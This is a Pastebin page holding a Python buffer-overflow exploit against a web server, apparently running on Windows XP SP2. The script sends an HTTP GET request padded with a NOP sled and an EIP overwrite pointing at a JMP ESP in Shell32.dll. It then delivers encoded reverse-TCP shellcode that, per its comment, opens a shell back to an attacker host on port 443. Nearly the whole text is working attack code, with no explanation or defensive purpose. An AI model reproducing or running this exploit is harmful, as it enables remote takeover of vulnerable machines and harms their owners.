Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import socket
- target_address="192.168.2.7"
- target_port=80
- buffer = "GET "
- buffer+= "\x90" * 1787
- buffer+= "\xF3\x30\x9D\x7C" # EIP Overwrite. Shell32.dll, XP SP2, JMP ESP, 7C9D30F3.
- # msfpayload windows/shell_reverse_tcp LHOST=192.168.2.15 LPORT=443 R | msfencode -a x86 -b '\x00\x0a\x0d' -t c - x86/shikata_ga_nai 342 bytes
- buffer+= "\x90" * 16
- buffer+= ("\xdb\xdd\xd9\x74\x24\xf4\x2b\xc9\xb1\x4f\x58\xba\x2c\x98\x23" "\x31\xc9\xba\xb6\x11\x96\xe7\xd9\xc5\xd9\x74\x24\xf4\x5e\xb1" "\x4f\x31\x56\x13\x03\x56\x13\x83\xee\xfc\xe2\x43\xed\x7e\x6e"
- "\xab\x0e\x7f\x11\x22\xeb\x4e\x03\x50\x7f\xe2\x93\x13\x2d\x0f"
- "\x5f\x71\xc6\x84\x2d\x5d\xe9\x2d\x9b\xbb\xc4\xae\x2d\x03\x8a"
- "\x6d\x2f\xff\xd1\xa1\x8f\x3e\x1a\xb4\xce\x07\x47\x37\x82\xd0"
- "\x03\xea\x33\x55\x51\x37\x35\xb9\xdd\x07\x4d\xbc\x22\xf3\xe7"
- "\xbf\x72\xac\x7c\xf7\x6a\xc6\xdb\x27\x8a\x0b\x38\x1b\xc5\x20"
- "\x8b\xe8\xd4\xe0\xc5\x11\xe7\xcc\x8a\x2c\xc7\xc0\xd3\x69\xe0"
- "\x3a\xa6\x81\x12\xc6\xb1\x52\x68\x1c\x37\x46\xca\xd7\xef\xa2"
- "\xea\x34\x69\x21\xe0\xf1\xfd\x6d\xe5\x04\xd1\x06\x11\x8c\xd4"
- "\xc8\x93\xd6\xf2\xcc\xf8\x8d\x9b\x55\xa5\x60\xa3\x85\x01\xdc"
- "\x01\xce\xa0\x09\x33\x8d\xac\xfe\x0e\x2d\x2d\x69\x18\x5e\x1f"
- "\x36\xb2\xc8\x13\xbf\x1c\x0f\x53\xea\xd9\x9f\xaa\x15\x1a\xb6"
- "\x68\x41\x4a\xa0\x59\xea\x01\x30\x65\x3f\x85\x60\xc9\x90\x66"
- "\xd0\xa9\x40\x0f\x3a\x26\xbe\x2f\x45\xec\xc9\x77\xd1\xcf\x62"
- "\x75\x2e\xb8\x70\x7a\x31\x83\xfc\x9c\x5b\xe3\xa8\x37\xf3\x9a"
- "\xf0\xcc\x62\x62\x2f\x44\x07\xf1\xb4\x95\x4e\xea\x62\xc1\x07"
- "\xdc\x7a\x87\xb5\x47\xd5\xba\x44\x11\x1e\x7e\x92\xe2\xa1\x7e"
- "\x57\x5e\x86\x90\xa1\x5f\x82\xc4\x7d\x36\x5c\xb3\x3b\xe0\x2e"
- "\x6d\x95\x5f\xf9\xf9\x60\xac\x3a\x7c\x6d\xf9\xcc\x60\xdf\x54"
- "\x89\x9f\xef\x30\x1d\xe7\x12\xa1\xe2\x32\x97\xd1\xa8\x1f\xb1"
- "\x79\x75\xca\x80\xe7\x86\x20\xc6\x11\x05\xc1\xb6\xe5\x15\xa0"
- "\xb3\xa2\x91\x58\xc9\xbb\x77\x5f\x7e\xbb\x5d\x55")
- buffer+= " HTTP/1.1\r\n\r\n"
- sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- connect=sock.connect((target_address,target_port))
- sock.send(buffer)
- sock.close()
Add Comment
Please, Sign In to add comment